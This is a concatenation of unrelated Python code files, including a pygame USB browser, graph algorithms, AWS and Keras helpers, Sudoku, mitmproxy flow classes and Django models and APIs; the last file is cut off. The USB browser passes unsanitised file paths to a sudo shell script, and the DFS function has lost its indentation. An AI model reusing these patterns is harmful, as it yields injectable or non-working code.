    BUTTON5 = (630,488,170,114)
    BUTTON5s = [630,488,170,114]
    screenNeedsRedraw = True
    # Mirror hit-boxes when the touch panel axes are inverted.
    if XINV == True:
        BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
        BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
        BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
        BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
        BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
    if YINV == True:
        BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
        BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
        BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
        BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
        BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
    # Mount the stick; the helper scripts list directory entries into
    # usbdata.txt which filelines() renders (presumably returning the
    # currently selected entry name -- confirm in filelines()).
    os.system('sudo sh ./mountusb.sh')
    p_app=filelines(30, 40, "usbdata.txt", 0, 20, 45, 1)
    line_sel=1      # 1-based selected line within the visible page
    line_off=0      # offset of the first visible line (paging, 20 per page)
    path_usb_file=os.path.join('/media','usbstick')
    while True:
        if screenNeedsRedraw:
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON1,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON2,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON3,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON4,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON5,2)
            pygame.display.update()
            FPSCLOCK.tick(300)
        screenNeedsRedraw = False  # by default, don't redraw the screen
        event = pygame.event.wait()
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
        elif event.type == KEYUP:
            if event.key == K_ESCAPE:
                pygame.quit()
                sys.exit()
        elif event.type == MOUSEBUTTONUP:
            screenNeedsRedraw = True  # screen should be redrawn
            mousex, mousey = event.pos
            # Check which on-screen button was tapped.
            if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
                # UP: move selection up, wrapping to the previous page.
                if(line_sel>=1):
                    line_sel-=1
                if(line_sel==0):
                    line_sel=20
                    line_off-=20
                DISPLAYSURF.blit(SIMAGE, (0, 0))
                p_app=filelines(30, 40, "usbdata.txt", line_off, 20, 45, line_sel)
                print 'USB UP'
            elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
                # BACK: go up one directory and re-list it from the top.
                path_usb_file=os.path.join(path_usb_file,'..')
                os.environ['usbfp']=path_usb_file
                os.system('echo $usbfp')
                os.system('sudo sh ./file_in_dir.sh $usbfp')
                DISPLAYSURF.blit(SIMAGE, (0, 0))
                line_off=0
                line_sel=1
                p_app=filelines(30, 40, "usbdata.txt", line_off, 20, 45, line_sel)
                print 'USB BACK'
            elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
                # ENTER: descend into the selected entry and re-list it.
                path_usb_file=os.path.join(path_usb_file,p_app)
                os.environ['usbfp']=path_usb_file
                os.system('echo $usbfp')
                os.system('sudo sh ./file_in_dir.sh $usbfp')
                DISPLAYSURF.blit(SIMAGE, (0, 0))
                line_off=0
                line_sel=1
                p_app=filelines(30, 40, "usbdata.txt", line_off, 20, 45, line_sel)
                print 'USB ENTER'
            elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
                # DOWN: move selection down, wrapping to the next page.
                if(line_sel<=20):
                    line_sel+=1
                if(line_sel==21):
                    line_sel=1
                    line_off+=20
                DISPLAYSURF.blit(SIMAGE, (0, 0))
                p_app=filelines(30, 40, "usbdata.txt", line_off, 20, 45, line_sel)
                print 'USB DOWN'
            elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
                # CANCEL: decode the current gcode, redraw the preview and
                # return to the home screen.
                print 'USB CANCEL'
                gdc_file = os.path.join(main_dir,'gdecode.exe' )
                os.system(gdc_file)
                dstx,dsty,dscale=getscale(590,540)
                get_stpz(dstx,dsty,dscale)
                print str(dstx)+", "+str(dsty)+", "+str(dscale)
                gdraw2(dstx,dsty,dscale,WHITE)
                screenHome()
        pygame.display.update()
def checkForQuit():
    """Terminate on any pending QUIT event or Esc key-up; repost other
    KEYUP events so callers can still see them."""
    # Terminates the program if there are any QUIT or escape key events.
    for event in pygame.event.get(QUIT):  # get all the QUIT events
        pygame.quit()  # terminate if any QUIT events are present
        sys.exit()
    for event in pygame.event.get(KEYUP):  # get all the KEYUP events
        if event.key == K_ESCAPE:
            pygame.quit()  # terminate if the KEYUP event was for the Esc key
            sys.exit()
        pygame.event.post(event)  # put the other KEYUP event objects back
# NOTE(review): this pygame.quit() executes at import time, before main()
# ever runs -- it looks like a mis-indented tail of checkForQuit(); confirm
# against the original source.
pygame.quit()

if __name__ == '__main__':
    main()
| StarcoderdataPython |
3219665 | import numba as nb
import numpy as np
from dsa.topology.graph.jit.csgraph_to_directed import csgraph_to_directed
from dsa.topology.graph.jit.sort_csgraph import sort_csgraph
# TODO cut below
# DFS
@nb.njit
def connected_components_dfs(n: int, g: np.ndarray):
g = csgraph_to_directed(g)
g, edge_idx, _ = sort_csgraph(n, g)
label = np.full(n, -1, np.int64)
l = 0
for i in range(n):
if label[i] != -1:
continue
label[i] = l
st = [i]
while st:
u = st.pop()
for v in g[edge_idx[u] : edge_idx[u + 1], 1]:
if label[v] != -1:
continue
label[v] = l
st.append(v)
l += 1
return label
# BFS
@nb.njit
def connected_components_bfs(n: int, g: np.ndarray):
    """Label connected components via breadth-first search.

    Same contract as connected_components_dfs; only traversal order
    differs (and therefore which nodes get which ids is identical, since
    components are discovered in index order).
    """
    g = csgraph_to_directed(g)
    g, edge_idx, _ = sort_csgraph(n, g)
    label = np.full(n, -1, np.int64)  # -1 marks "not yet visited"
    l = 0  # next component id to assign
    for i in range(n):
        if label[i] != -1:
            continue
        label[i] = l
        # The list doubles as a FIFO queue: iterating while appending
        # visits nodes in breadth-first order.
        que = [i]
        for u in que:
            for v in g[edge_idx[u] : edge_idx[u + 1], 1]:
                if label[v] != -1:
                    continue
                label[v] = l
                que.append(v)
        l += 1
    return label
# with union find
| StarcoderdataPython |
3376463 | <reponame>ForwardLine/backup-nanny<filename>backup_nanny/util/lambda_client.py<gh_stars>1-10
from boto3.session import Session
from sys import exit
class LambdaClient(object):
    """Small convenience wrapper around the boto3 AWS Lambda client."""

    def __init__(self, session=None):
        # Build the underlying boto3 client once, from the supplied
        # session or a fresh default one.
        self.client = self.get_client(session)

    def get_client(self, session=None):
        """Return a boto3 'lambda' client for *session* (default Session if None)."""
        return (session or Session()).client('lambda')

    def invoke(self, name, payload, invocation_type='Event'):
        """Invoke Lambda function *name* with *payload*; async ('Event') by default."""
        return self.client.invoke(
            FunctionName=name,
            InvocationType=invocation_type,
            Payload=payload)
| StarcoderdataPython |
1686147 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2017 - 2019 Karlsruhe Institute of Technology - Steinbuch Centre for Computing
# This code is distributed under the MIT License
# Please, see the LICENSE file
#
import os
import numpy as np
import dogs_breed_det.config as cfg
import dogs_breed_det.dataset.data_utils as dutils
def set_features_file(dataset_type, network='Resnet50', return_type='path'):
    """Locate the bottleneck-features file for one dataset split.

    Depending on *return_type*, returns the directory holding the file
    ('dir'), the bare file name ('file'), or the full path (default).
    """
    # Directory holding the file (relative), bare file name, and full path.
    features_dir = os.path.join('data', 'bottleneck_features')
    features_name = 'Dogs_' + network + '_features_' + dataset_type + '.npz'
    features_path = os.path.join(cfg.BASE_DIR, features_dir, features_name)
    # Dispatch on the requested representation; anything else gets the path.
    return {'dir': features_dir,
            'file': features_name}.get(return_type, features_path)
def build_features(data_type, network='Resnet50'):
    """Compute and save bottleneck features for one dataset split.

    Loads the image files for *data_type* ('train'/'test'/'valid'),
    runs them through the chosen pre-trained network, and stores the
    features in an .npz archive keyed by the split name (any other
    split name is saved under 'features' -- note load_features() only
    looks up the three standard keys).
    """
    # Map network name -> feature extractor defined below in this module.
    nets = {'VGG16': extract_VGG16,
            'VGG19': extract_VGG19,
            'Resnet50': extract_Resnet50,
            'InceptionV3': extract_InceptionV3,
            'Xception': extract_Xception,
            }

    data_dir = os.path.join(cfg.BASE_DIR, 'data', cfg.Dog_DataDir, data_type)
    img_files = dutils.load_data_files(data_dir)

    print("[DEBUG] build_features, img_files: ", img_files[:5])
    # Unknown *network* raises KeyError here.
    bottleneck_features = nets[network](dutils.paths_to_tensor(img_files))
    bottleneck_path = set_features_file(data_type, network,
                                        return_type='path')

    # Save under a key matching the split so load_features() can find it.
    if data_type == 'train':
        np.savez(bottleneck_path, train=bottleneck_features)
    elif data_type == 'test':
        np.savez(bottleneck_path, test=bottleneck_features)
    elif data_type == 'valid':
        np.savez(bottleneck_path, valid=bottleneck_features)
    else:
        np.savez(bottleneck_path, features=bottleneck_features)

    print("[INFO] Bottleneck features size (build_features):",
          bottleneck_features.shape)

    return bottleneck_features
def load_features(data_type, network='Resnet50'):
    """Load saved bottleneck features for one split ('train'/'valid'/'test').

    Raises KeyError if the archive was saved under a different key.
    """
    bottleneck_path = set_features_file(data_type, network)
    print("[INFO] Using %s" % bottleneck_path)
    archive = np.load(bottleneck_path)
    return archive[data_type]
# Thin wrappers around the Keras pre-trained CNNs. Each one preprocesses
# the image tensor with the network's own preprocess_input and returns the
# convolutional ("bottleneck") features, i.e. the include_top=False output.
# Imports are local so only the selected backbone is loaded.

def extract_VGG16(tensor):
    from keras.applications.vgg16 import VGG16, preprocess_input
    return VGG16(weights='imagenet', include_top=False).predict(preprocess_input(tensor))

def extract_VGG19(tensor):
    from keras.applications.vgg19 import VGG19, preprocess_input
    return VGG19(weights='imagenet', include_top=False).predict(preprocess_input(tensor))

def extract_Resnet50(tensor):
    from keras.applications.resnet50 import ResNet50, preprocess_input
    return ResNet50(weights='imagenet', include_top=False).predict(preprocess_input(tensor))

def extract_Xception(tensor):
    from keras.applications.xception import Xception, preprocess_input
    return Xception(weights='imagenet', include_top=False).predict(preprocess_input(tensor))

def extract_InceptionV3(tensor):
    from keras.applications.inception_v3 import InceptionV3, preprocess_input
    return InceptionV3(weights='imagenet', include_top=False).predict(preprocess_input(tensor))
| StarcoderdataPython |
1754075 | #!/usr/bin/python3
"""defining to_json_string function"""
import json
def to_json_string(my_obj):
    """Serialize *my_obj* and return the resulting JSON text."""
    json_text = json.dumps(my_obj)
    return json_text
| StarcoderdataPython |
1640893 | <gh_stars>0
from braces.views import LoginRequiredMixin
from django.views.generic import TemplateView
class LandingPageView(TemplateView):
    """Landing page for registering and logging in."""
    # Static template; no extra context required.
    template_name = 'frontend/index.html'
class ArianeView(LoginRequiredMixin, TemplateView):
    """The core view of the project; requires an authenticated user."""
    template_name = 'frontend/ariane.html'
| StarcoderdataPython |
1688863 | <filename>sudoku.py
# Sudoku class
class Sudoku:
    """A 9x9 Sudoku board stored as a flat list of 81 ints (0 = empty).

    Cell (row, col) lives at index ``row * 9 + col``.
    """

    def __init__(self, matrix):
        self.board = self.load(matrix)

    def load(self, matrix):
        """Return *matrix* if it is a valid 81-cell layout, else an empty board."""
        if self.isMatrixValid(matrix):
            return matrix
        return [0] * 81

    def display(self):
        """Print the board, one row per line, with '-' for empty cells."""
        for row in range(9):
            cells = []
            for col in range(9):
                value = self.board[row * 9 + col]
                cells.append('%d ' % value if value > 0 else '- ')
            print(''.join(cells))
        print('\n')

    def add(self, row, col, value):
        """Place *value* (1-9) at (row, col); bad arguments are ignored."""
        if row in range(9) and col in range(9) and value in range(1, 10):
            self.board[row * 9 + col] = value

    def remove(self, row, col):
        """Clear the cell at (row, col); bad arguments are ignored."""
        if row in range(9) and col in range(9):
            self.board[row * 9 + col] = 0

    def isMatrixValid(self, matrix):
        """True when *matrix* has exactly 81 entries, all in 0..9."""
        if len(matrix) != 81:
            return False
        return all(v in range(10) for v in matrix)

    def isValid(self):
        """True when no row, column or 3x3 square repeats a digit."""
        return (self.isRowValid()
                and self.isColumnValid()
                and self.isSquareValid())

    def isSolved(self):
        """True when the board is valid and has no empty cells."""
        if not self.isValid():
            return False
        return all(cell != 0 for cell in self.board)

    def _hasNoDuplicates(self, values):
        """True when no digit 1-9 occurs more than once in *values*."""
        return all(values.count(digit) <= 1 for digit in range(1, 10))

    def isRowValid(self):
        """True when every row is free of duplicate digits."""
        return all(
            self._hasNoDuplicates(self.board[row * 9:row * 9 + 9])
            for row in range(9))

    def isColumnValid(self):
        """True when every column is free of duplicate digits."""
        return all(
            self._hasNoDuplicates(self.board[col::9])
            for col in range(9))

    def isSquareValid(self):
        """True when every 3x3 square is free of duplicate digits."""
        for square in range(9):
            top = (square // 3) * 3
            left = (square % 3) * 3
            cells = [self.board[(top + k // 3) * 9 + left + k % 3]
                     for k in range(9)]
            if not self._hasNoDuplicates(cells):
                return False
        return True
# Testing / demo driver
if __name__ == '__main__':
    # Board is solved except for the 0 at row 6, column 7 (should be 8).
    sample = [
        1, 4, 5, 6, 2, 7, 8, 9, 3,
        2, 9, 3, 4, 1, 8, 6, 7, 5,
        6, 7, 8, 3, 9, 5, 1, 2, 4,
        5, 2, 7, 1, 6, 3, 9, 4, 8,
        4, 1, 9, 8, 5, 2, 7, 3, 6,
        3, 8, 6, 7, 4, 9, 2, 5, 1,
        9, 6, 2, 5, 3, 1, 4, 0, 7,
        8, 3, 4, 9, 7, 6, 5, 1, 2,
        7, 5, 1, 2, 8, 4, 3, 6, 9
    ]
    sudoku = Sudoku(sample)
    sudoku.display()
    print(sudoku.isSolved())  # False: one empty cell remains
    sudoku.add(6, 7, 8)
    sudoku.display()
    print(sudoku.isSolved())  # True: board complete and valid
    sudoku.remove(4, 5)
    sudoku.display()
    print(sudoku.isSolved())  # False again after clearing a cell
| StarcoderdataPython |
5928 | <reponame>ChidinmaKO/Chobe-bitesofpy
def get_index_different_char(chars):
    """Return the index of the single element whose alphanumeric-ness
    differs from the rest of *chars*.

    Elements are stringified before testing, so ints count as
    alphanumeric. Assumes exactly one element is the odd one out.
    """
    alnum_indices = [i for i, ch in enumerate(chars) if str(ch).isalnum()]
    other_indices = [i for i, ch in enumerate(chars) if not str(ch).isalnum()]
    # The minority list holds the odd one out.
    if len(alnum_indices) < len(other_indices):
        return alnum_indices[0]
    return other_indices[0]
# tests
def test_wrong_char():
    """Exercise get_index_different_char against known inputs/expected indices."""
    inputs = (
        ['A', 'f', '.', 'Q', 2],                          # lone non-alnum at 2
        ['.', '{', ' ^', '%', 'a'],                       # lone alnum at 4
        [1, '=', 3, 4, 5, 'A', 'b', 'a', 'b', 'c'],       # lone non-alnum at 1
        ['=', '=', '', '/', '/', 9, ':', ';', '?', '¡'],  # lone alnum at 5
        list(range(1,9)) + ['}'] + list('abcde'),  # noqa E231
    )
    expected = [2, 4, 1, 5, 8]
    for arg, exp in zip(inputs, expected):
        err = f'get_index_different_char({arg}) should return index {exp}'
        assert get_index_different_char(arg) == exp, err
3285079 | <reponame>lightsey/cinder<gh_stars>1-10
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Stochastic weight handler
This weight handler differs from the default weight
handler by giving every pool a chance to be chosen
where the probability is proportional to each pools'
weight.
"""
import random
from cinder.scheduler import base_weight
from cinder.scheduler import weights as wts
class StochasticHostWeightHandler(base_weight.BaseWeightHandler):
    """Weight handler that picks a pool by lottery, proportional to weight.

    Unlike the default handler, every pool has a chance of being chosen;
    the probability of each is proportional to its accumulated weight.
    """

    def __init__(self, namespace):
        super(StochasticHostWeightHandler, self).__init__(wts.BaseHostWeigher,
                                                          namespace)

    def get_weighed_objects(self, weigher_classes, obj_list,
                            weighing_properties):
        """Return obj_list wrapped in WeighedHosts, rotated so that a
        randomly drawn winner (probability proportional to weight) is
        first; callers take the head of the list.
        """
        # The normalization performed in the superclass is nonlinear, which
        # messes up the probabilities, so override it. The probabilistic
        # approach we use here is self-normalizing.
        # Also, the sorting done by the parent implementation is harmless
        # but useless for us.

        # Compute the object weights as the parent would but without
        # sorting or normalization.
        weighed_objs = [wts.WeighedHost(obj, 0.0) for obj in obj_list]
        for weigher_cls in weigher_classes:
            weigher = weigher_cls()
            weights = weigher.weigh_objects(weighed_objs, weighing_properties)
            for i, weight in enumerate(weights):
                weighed_objs[i].weight += weigher.weight_multiplier() * weight

        # Avoid processing empty lists
        if not weighed_objs:
            return []

        # Build the cumulative-weight table: each entry holds the upper
        # bound for that object to "win" the lottery.
        total_weight = 0
        table = []
        for weighed_obj in weighed_objs:
            total_weight += weighed_obj.weight
            table.append((total_weight, weighed_obj))

        # Draw a random value within the computed range.
        winning_value = random.random() * total_weight

        # The first object whose cumulative maximum exceeds the draw wins.
        # BUG FIX: with floating point rounding it is possible that
        # winning_value >= total_weight, so the scan finds no winner; in
        # that case the winner should be the *last* element (as the
        # original comment already stated), so default the index to it
        # instead of 0.
        winning_index = len(weighed_objs) - 1
        for i, (max_value, _weighed_obj) in enumerate(table):
            if max_value > winning_value:
                winning_index = i
                break

        # Rotate the list so the winner comes first.
        return weighed_objs[winning_index:] + weighed_objs[0:winning_index]
| StarcoderdataPython |
3363102 | <reponame>mboos/advent-of-code
# Lint as: python3
"""Counts valid passwords
Solution to part 2 of https://adventofcode.com/2020/day/2
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from absl import app
from absl import flags
FLAGS = flags.FLAGS
# Command-line flags. --input (required) is the puzzle input file.
# --target is not referenced anywhere in this file — presumably kept for
# parity with the part-1 solution; confirm before removing.
flags.DEFINE_integer("target", 2020, "Target value")
flags.DEFINE_string("input", None, "Input file.")
flags.mark_flag_as_required("input")
# Policy line format: "<min>-<max> <letter>: <password>".
pattern = re.compile(r"(?P<min>\d+)-(?P<max>\d+) (?P<letter>\w): (?P<password>\w+)")


def parse(line):
    """Parse one policy line into (min, max, letter, password)."""
    match = pattern.match(line)
    lo, hi, letter, password = match.group('min', 'max', 'letter', 'password')
    return int(lo), int(hi), letter, password
def main(argv):
    """Count passwords where exactly one of the two 1-based positions
    holds the policy letter (XOR), and print the count."""
    if len(argv) > 2:
        raise app.UsageError('Too many command-line arguments.')

    with open(FLAGS.input) as fp:
        rows = list(map(parse, fp))

    valid = 0
    for a, b, letter, password in rows:
        # The two conditions are mutually exclusive, so at most one
        # increment per row -- exactly-one-match semantics.
        if password[a-1] == letter and password[b-1] != letter:
            valid += 1
        if password[b-1] == letter and password[a-1] != letter:
            valid += 1
    print(valid)


if __name__ == '__main__':
    app.run(main)
| StarcoderdataPython |
4825311 | from generator import (
GenerateGemmOperations,
GenerateGemvOperations,
GenerateConv2dOperations,
GenerateDeconvOperations,
)
class GenArg:
    """Minimal stand-in for the argparse namespace the Generate* functions
    expect -- they presumably read .operations and .type; confirm in the
    generator module."""
    def __init__(self, gen_op, gen_type):
        self.operations = gen_op
        self.type = gen_type
def write_op_list(f, gen_op, gen_type):
    """Write the generated .cu file names for one (op, type) pair to *f*.

    gen_op selects the operation family ('gemm', 'gemv', 'conv2d',
    'deconv'); gen_type is the implementation flavor (e.g. 'simt').
    For every family except 'gemv' an aggregate all_<op>_<type> source is
    appended as well.

    Raises ValueError for an unsupported gen_op (previously this left
    'operations' unbound and failed later with a confusing NameError).
    """
    # Dispatch table instead of an if/elif chain.
    generators = {
        "gemm": GenerateGemmOperations,
        "gemv": GenerateGemvOperations,
        "conv2d": GenerateConv2dOperations,
        "deconv": GenerateDeconvOperations,
    }
    if gen_op not in generators:
        raise ValueError("unsupported operation kind: %r" % (gen_op,))
    operations = generators[gen_op](GenArg(gen_op, gen_type))
    for op in operations:
        f.write(' "%s.cu",\n' % op.procedural_name())
    if gen_op != "gemv":
        f.write(' "all_%s_%s_operations.cu",\n' % (gen_op, gen_type))
if __name__ == "__main__":
    # Regenerate the Bazel list of all generated cutlass kernel sources.
    with open("list.bzl", "w") as f:
        f.write("# Generated by dnn/scripts/cutlass_generator/gen_list.py\n\n")
        f.write("cutlass_gen_list = [\n")
        write_op_list(f, "gemm", "simt")
        write_op_list(f, "gemv", "simt")
        write_op_list(f, "deconv", "simt")
        write_op_list(f, "conv2d", "simt")
        write_op_list(f, "conv2d", "tensorop8816")
        write_op_list(f, "conv2d", "tensorop8832")
        f.write("]")
| StarcoderdataPython |
33788 | import collections
# Python 2/3 compatibility: the base string type differs between versions.
try:
    stringtype = basestring  # python 2
except NameError:
    stringtype = str  # python 3


def coerce_to_list(x):
    """Turn a comma/space separated string into a token list; pass other
    iterables through; map falsy values to []."""
    if isinstance(x, stringtype):
        return x.replace(',', ' ').split()
    return x if x else []


def namedtuple(name, args=None, optional=None):
    """collections.namedtuple whose trailing *optional* fields default to None.

    Both *args* and *optional* may be given as comma/space separated
    strings or as sequences of field names.
    """
    required = coerce_to_list(args)
    opt_fields = coerce_to_list(optional)
    result = collections.namedtuple(name, required + opt_fields)
    defaults = tuple([None] * len(opt_fields))
    # Install the defaults on __new__ under whichever attribute this
    # interpreter uses.
    if hasattr(result.__new__, 'func_defaults'):  # python 2
        result.__new__.func_defaults = defaults
    elif hasattr(result.__new__, '__defaults__'):  # python 3
        result.__new__.__defaults__ = defaults
    else:
        raise Exception('???')
    return result
def optional(fn):
    """Wrap *fn* so that a None argument is passed through untouched."""
    def wrapper(value):
        if value is None:
            return None
        return fn(value)
    return wrapper
| StarcoderdataPython |
3385754 | from django.db import models
from datetime import datetime
# Create your models here.
class Container(models.Model):
    """A shipping container and its most recently imported tracking status."""
    # max_length=11 matches the standard ISO 6346 container-number length —
    # presumably the intent; confirm.
    number = models.CharField(max_length=11)
    carrier = models.CharField(max_length=128)
    status = models.CharField(max_length=200)
    date = models.DateTimeField()
    location = models.CharField(max_length=300)
    # NOTE(review): datetime.now produces a naive timestamp; if the project
    # has USE_TZ enabled, django.utils.timezone.now would be the correct
    # default — confirm settings before changing.
    last_import = models.DateTimeField(default=datetime.now)
| StarcoderdataPython |
154524 | from __future__ import absolute_import
import copy
import netlib.tcp
from .. import stateobject, utils, version
from ..proxy.primitives import AddressPriority
from ..proxy.connection import ClientConnection, ServerConnection
KILL = 0 # const for killed requests
class BackreferenceMixin(object):
    """Automatically set a back-reference on assigned attribute values.

    Whenever an attribute named in ``_backrefattr`` is assigned a
    non-None value, the assigned object receives an attribute (named by
    ``_backrefname``) pointing back at *self*.

    Example:
        e = Error()
        f = Flow()
        f.error = e
        assert f is e.flow
    """
    _backrefattr = tuple()

    def __setattr__(self, key, value):
        super(BackreferenceMixin, self).__setattr__(key, value)
        if value is None or key not in self._backrefattr:
            return
        setattr(value, self._backrefname, self)
class Error(stateobject.SimpleStateObject):
    """
    An Error.

    This is distinct from an HTTP error response (say, a code 500), which
    is represented by a normal Response object. This class is responsible
    for indicating errors that fall outside of normal HTTP communications,
    like interrupted connections, timeouts, protocol errors.

    Exposes the following attributes:

        flow: Flow object
        msg: Message describing the error
        timestamp: Seconds since the epoch
    """
    def __init__(self, msg, timestamp=None):
        """
        @type msg: str
        @type timestamp: float
        """
        self.flow = None  # will usually be set by the flow backref mixin
        self.msg = msg
        # Default to "now" when no explicit timestamp is supplied.
        self.timestamp = timestamp or utils.timestamp()

    # Attributes (de)serialized by SimpleStateObject's state machinery.
    _stateobject_attributes = dict(
        msg=str,
        timestamp=float
    )

    def __str__(self):
        return self.msg

    @classmethod
    def _from_state(cls, state):
        # Build an empty Error first, then load the saved state into it.
        f = cls(None)  # the default implementation assumes an empty constructor. Override accordingly.
        f._load_state(state)
        return f

    def copy(self):
        # Shallow copy is sufficient: msg and timestamp are immutable.
        c = copy.copy(self)
        return c
class Flow(stateobject.SimpleStateObject, BackreferenceMixin):
    """Base class for one client<->server exchange.

    Holds the two connection objects plus an optional Error, and supports
    snapshotting its full state via backup()/revert().
    """
    def __init__(self, conntype, client_conn, server_conn):
        self.conntype = conntype
        self.client_conn = client_conn
        """@type: ClientConnection"""
        self.server_conn = server_conn
        """@type: ServerConnection"""
        self.error = None
        """@type: Error"""
        self._backup = None  # snapshot taken by backup(), or None

    # Assigning .error sets error.flow = self (see BackreferenceMixin).
    _backrefattr = ("error",)
    _backrefname = "flow"

    _stateobject_attributes = dict(
        error=Error,
        client_conn=ClientConnection,
        server_conn=ServerConnection,
        conntype=str
    )

    def _get_state(self):
        # Tag the serialized state with the release version.
        d = super(Flow, self)._get_state()
        d.update(version=version.IVERSION)
        return d

    def __eq__(self, other):
        # Flows compare by identity, never by value.
        return self is other

    def copy(self):
        # Deep-ish copy: the connections (and error, if any) are copied
        # so that edits to the copy don't leak into the original.
        f = copy.copy(self)
        f.client_conn = self.client_conn.copy()
        f.server_conn = self.server_conn.copy()
        if self.error:
            f.error = self.error.copy()
        return f

    def modified(self):
        """
        Has this Flow been modified?
        """
        if self._backup:
            return self._backup != self._get_state()
        else:
            return False

    def backup(self, force=False):
        """
        Save a backup of this Flow, which can be reverted to using a
        call to .revert().
        """
        # NOTE(review): *force* is accepted but never used — an existing
        # backup is never overwritten; confirm whether that is intended.
        if not self._backup:
            self._backup = self._get_state()

    def revert(self):
        """
        Revert to the last backed up state.
        """
        if self._backup:
            self._load_state(self._backup)
            self._backup = None
class ProtocolHandler(object):
    """Abstract base class for protocol-specific connection handling."""
    def __init__(self, c):
        self.c = c
        """@type: libmproxy.proxy.ConnectionHandler"""

    def handle_messages(self):
        """
        This method gets called if a client connection has been made. Depending on the proxy settings,
        a server connection might already exist as well.
        """
        raise NotImplementedError  # pragma: nocover

    def handle_error(self, error):
        """
        This method gets called should there be an uncaught exception during the connection.
        This might happen outside of handle_messages, e.g. if the initial SSL handshake fails in transparent mode.
        """
        # Default behaviour: propagate the error to the caller.
        raise error  # pragma: nocover
class TemporaryServerChangeMixin(object):
    """
    This mixin allows safe modification of the target server,
    without any need to expose the ConnectionHandler to the Flow.
    """
    def change_server(self, address, ssl):
        """Temporarily redirect the server connection to *address*.

        The first call stashes the original connection so that
        restore_server() can put it back; subsequent calls discard the
        intermediate temporary connection instead.
        """
        address = netlib.tcp.Address.wrap(address)
        if address == self.c.server_conn.address():
            return  # already connected to the requested server
        priority = AddressPriority.MANUALLY_CHANGED

        self.c.log("Temporarily change server connection: %s:%s -> %s:%s" % (
            self.c.server_conn.address.host,
            self.c.server_conn.address.port,
            address.host,
            address.port
        ), "debug")

        if not hasattr(self, "_backup_server_conn"):
            # First redirect: keep the original connection for restore.
            self._backup_server_conn = self.c.server_conn
            self.c.server_conn = None
        else:  # This is at least the second temporary change. We can kill the current connection.
            self.c.del_server_connection()

        self.c.set_server_address(address, priority)
        if ssl:
            self.c.establish_ssl(server=True)

    def restore_server(self):
        """Undo change_server(): reconnect to the originally stored server."""
        if not hasattr(self, "_backup_server_conn"):
            return  # nothing was changed; no-op

        self.c.log("Restore original server connection: %s:%s -> %s:%s" % (
            self.c.server_conn.address.host,
            self.c.server_conn.address.port,
            self._backup_server_conn.address.host,
            self._backup_server_conn.address.port
        ), "debug")

        self.c.del_server_connection()
        self.c.server_conn = self._backup_server_conn
        del self._backup_server_conn
1618253 | <reponame>nice-shot/FacebookFilter
from django.db import models
from django.contrib.auth import models as auth_models
from jsonfield import JSONCharField
# Create your models here.
class FacebookPage(models.Model):
"""
Represents a Facebook page, group or any other object that we can subscribe
to
"""
id = models.CharField(max_length=100, primary_key=True,
help_text="Page's facebook id")
name = models.CharField(max_length=300, blank=True,
help_text="Page or group's name")
class Filter(models.Model):
"""
Filter settings for a specific user
"""
user = models.ForeignKey(auth_models.User, related_name="filters")
name = models.CharField(max_length=200,
help_text="Name to identify the filter by")
filter_str = JSONCharField(max_length=1000)
# FacebookPage does not have back relation to Filter
pages = models.ManyToManyField(FacebookPage, related_name="+",
help_text="Pages to follow")
class Post(models.Model):
"""
Facebook post that we found relevant
"""
id = models.CharField(max_length=100, primary_key=True,
help_text="Facebook post id")
page = models.ForeignKey(FacebookPage, help_text="Page this post is from")
message = models.TextField()
user = models.CharField(max_length=300,
help_text="Post creator's user name")
created_time = models.DateTimeField()
updated_time = models.DateTimeField()
filters = models.ManyToManyField(Filter, through="FilteredPost",
related_name="posts")
class FilteredPost(models.Model):
"""
Relation between filter and post. This includes the user's comment and
whether the post is interesting
"""
filter = models.ForeignKey(Filter)
post = models.ForeignKey(Post)
found_time = models.DateTimeField(auto_now_add=True)
keep = models.NullBooleanField()
comment = models.TextField(blank=True)
| StarcoderdataPython |
178899 | <filename>accounts/api.py<gh_stars>0
from rest_framework import generics, permissions
from rest_framework.response import Response
from knox.models import AuthToken
from .serializers import UserSerializer, RegisterSerializer,LoginSerializer
# Register API
class RegisterAPI(generics.GenericAPIView):
serializer_class = RegisterSerializer
def post(self,request, *arg, **kwargs):
datos = {
"username": request.data.get("username"),
"password": request.data.get("password"),
"email": request.data.get("email")
}
serializer = self.get_serializer(data=datos)
serializer.is_valid(raise_exception=True)
user = serializer.save()
return Response({
"user": UserSerializer(user, context=self.get_serializer_context()).data,
"token": AuthToken.objects.create(user) [1]
})
# Login API
class LoginAPI(generics.GenericAPIView):
serializer_class = LoginSerializer
def post (self , request, *arg, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.validated_data
return Response({
